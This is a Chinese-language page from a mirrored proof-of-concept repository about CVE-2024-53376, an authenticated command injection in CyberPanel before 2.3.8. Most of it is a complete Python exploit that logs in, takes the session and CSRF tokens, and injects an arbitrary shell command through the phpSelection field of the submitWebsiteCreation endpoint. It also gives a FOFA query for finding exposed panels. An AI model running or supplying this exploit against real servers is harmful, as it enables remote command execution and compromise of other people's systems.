admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-07-29 22:14:15 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/cyberpanel/CyberPanel需授权命令注入漏洞(CVE-2024-53376).md

110 lines
3.3 KiB
Markdown
Raw Normal View History

first commit
2025-03-04 23:12:57 +08:00
# CyberPanel需授权命令注入漏洞(CVE-2024-53376)
CyberPanel开源面板存在一个命令注入漏洞,该漏洞允许远程认证用户构造恶意请求执行任意命令,导致服务器失陷,攻击者可以使用一个HTTP选项请求指示网络服务器运行CyberPanel应用程序执行任何命令。
## 影响版本
CyberPanel 版本 < 2.3.8
## fofa
```javascript
app="CyberPanel"
```
## poc
```python
#!/usr/bin/python3
# CVE-2024-53376
# Exploit Title: CyberPanel - Authenticated Remote Code Execution (RCE)
# Exploit Author: Ryan Putman
# Technical Details: https://github.com/ThottySploity/CVE-2024-53376
# Date: 2024-12-15
# Vendor Homepage: https://cyberpanel.net
# Tested On: Cyberpanel < 2.3.8
# Vulnerability Description:
# Command injection vulnerability in the submitWebsiteCreation endpoint
import argparse, requests, json
from requests.packages.urllib3.exceptions import InsecureRequestWarning
# Disabling the SSL errors (since CyberPanel runs on a self signed cert)
requests.packages.urllib3.disable_warnings(InsecureRequestWarning)
arg_parser = argparse.ArgumentParser()
arg_parser.add_argument('-t', metavar='target', help='ip address or domain of Cyberpanel', required=True)
arg_parser.add_argument('-u', metavar='username', required=True)
arg_parser.add_argument('-p', metavar='password', required=True)
arg_parser.add_argument('-c', metavar='cmd', default='id > /tmp/rce #', help='command to execute')
args = arg_parser.parse_args()
# Obtaining the CSRF token used for authentication
csrf_token = requests.get(args.t, verify=False).headers.get('Set-Cookie').split(';')[0]
if len(csrf_token) > 0:
print(f"[+] Obtained the following CSRFTOKEN: {csrf_token}")
payload = {
"username": args.u,
"password": args.p,
"languageSelection": "english",
}
headers = {
'Cookie': csrf_token,
'Accept': 'application/json',
'X-Csrftoken': csrf_token.replace('csrftoken=', ''),
'Origin': 'https://localhost:8090',
'Referer': 'https://localhost:8090/',
'Connection': 'close'
}
# Obtaining the sessionId used for authorization.
sessionId = requests.post(
"{}/verifyLogin".format(args.t),
headers=headers,
data=json.dumps(payload),
verify=False,
).headers.get('Set-Cookie').split(';')[1].replace(" Path=/, ", "")
if len(sessionId) > 0:
print(f"[+] Obtained the following sessionId: {sessionId}")
exploitHeaders = {
'Cookie': f'{csrf_token}; django_language=en; {sessionId}',
'Accept': 'application/json',
'X-Csrftoken': csrf_token.replace('csrftoken=', ''),
'Origin': 'https://localhost:8090',
'Referer': 'https://localhost:8090/',
'Connection': 'close'
}
exploitPayload = {
"package": "Default",
"domainName": "cyberpanel.net",
"adminEmail": "cyberpanel@gmail.com",
"phpSelection": f"PHP 8.0'; {args.c}; #",
"ssl":0,
"websiteOwner":"admin",
"dkimCheck":0,
"openBasedir":0,
"mailDomain":0,
"apacheBackend":0,
}
# Sending the exploit to the vulnerable endpoint
exploitRequest = requests.options(f"{args.t}/websites/submitWebsiteCreation", headers=exploitHeaders, data=json.dumps(exploitPayload), verify=False)
if exploitRequest.status_code == 200:
print("[+] Exploit succeeded")
print(f"[+] Executed: {args.c}")
```
## 漏洞来源
- https://github.com/ThottySploity/CVE-2024-53376
Reference in New Issue Copy Permalink